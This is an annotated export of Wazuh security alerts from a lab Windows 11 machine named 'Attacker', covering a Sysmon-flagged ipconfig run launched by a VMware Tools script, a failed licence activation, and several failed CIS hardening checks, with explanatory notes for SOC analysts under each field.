data.win.eventdata.hashes:  SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bfdb-680a-a50c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3372
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Suspicious Windows cmd shell execution

🧠 What happened? Suspicious Windows cmd shell execution

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:49:51.233+0000 | 🧠 MITRE: ['Discovery', 'Execution'] – ['Account Discovery', 'Windows Command Shell'] [T1087] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:49:51.233+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Suspicious Windows cmd shell execution
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92032
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087', 'T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery', 'Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery', 'Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534991.2461732
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:08.3376108Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  344733
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:49:08.269 ProcessGuid: {94294ddc-bfe4-680a-af0c-000000000e00} ProcessId: 9536 Image: C:\Windows\System32\ipconfig.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: IP Configuration Utility Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: ipconfig.exe CommandLine: C:\WINDOWS\system32\ipconfig /renew CurrentDirectory: C:\Windows\System32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B ParentProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00} ParentProcessId: 3372 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:49:08.269
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bfe4-680a-af0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9536
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\ipconfig.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  IP Configuration Utility
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  ipconfig.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\ipconfig /renew
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Windows\\System32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bfdb-680a-a50c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3372
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

License activation (slui.exe) failed.

🧠 What happened? License activation (slui.exe) failed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:04.914+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:04.914+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  License activation (slui.exe) failed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60646
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535004.2467193
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Software Protection Platform Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  8198
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:49:31.1240683Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2428
Incremental log record number – handy for timeline order.

data.win.system.processID:  4516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Application
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  ERROR
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "License Activation (slui.exe) failed with the following error code: hr=0x80004005 Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.data:  hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.231+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.231+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.8.28.3']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2469515
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26257
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting prevents connected users from being enumerated on domain-joined computers. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  A malicious user could use this feature to gather account names of other users, that information could then be used in conjunction with other types of attacks such as guessing passwords or social engineering. The value of this countermeasure is small because a user with domain credentials could gather the same account information using other methods.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\System\Logon\Do not enumerate connected users on domain-joined computers. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Logon.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.8.28.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off app notifications on the lock screen' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off app notifications on the lock screen' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.274+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.274+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off app notifications on the lock screen' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.8.28.5']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2473013
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26259
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off app notifications on the lock screen' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to prevent app notifications from appearing on the lock screen. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  App notifications might display sensitive business or personal data.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\System\Logon\Turn off app notifications on the lock screen. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Logon.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.8.28.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  2.2.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off picture password sign-in' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off picture password sign-in' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.275+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.275+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off picture password sign-in' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '8.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.8.28.6']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2475885
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26260
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off picture password sign-in' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to control whether a domain user can sign in using a picture password. The recommended state for this setting is: Enabled. Note: If the picture password feature is permitted, the user's domain password is cached in the system vault when using it.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Picture passwords bypass the requirement for a typed complex password. In a shared work environment, a simple shoulder surf where someone observed the on-screen gestures would allow that person to gain access to the system without the need to know the complex password. Vertical monitor screens with an image are much more visible at a distance than horizontal key strokes, increasing the likelihood of a successful observation of the mouse gestures.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\System\Logon\Turn off picture password sign-in. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CredentialProviders.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.8.28.6
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  8.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.311+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.311+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '8.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.8.34.6.2']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2479733
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26265
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to control the network connectivity state in standby on modern standby-capable systems. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Disabling this setting ensures that the computer will not be accessible to attackers over a WLAN network while left unattended, plugged in and in a sleep state.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\System\Power Management\Sleep Settings\Allow network connectivity during connected-standby (plugged in). Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Power.admx/adml that is included with the Microsoft Windows 10 Release 1607 & Server 2016 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.8.34.6.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.pci_dss:  8.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.tsc:  CC6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Power\\PowerSettings\\f15576e8-98b7-4186-b944-eafa664402d9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

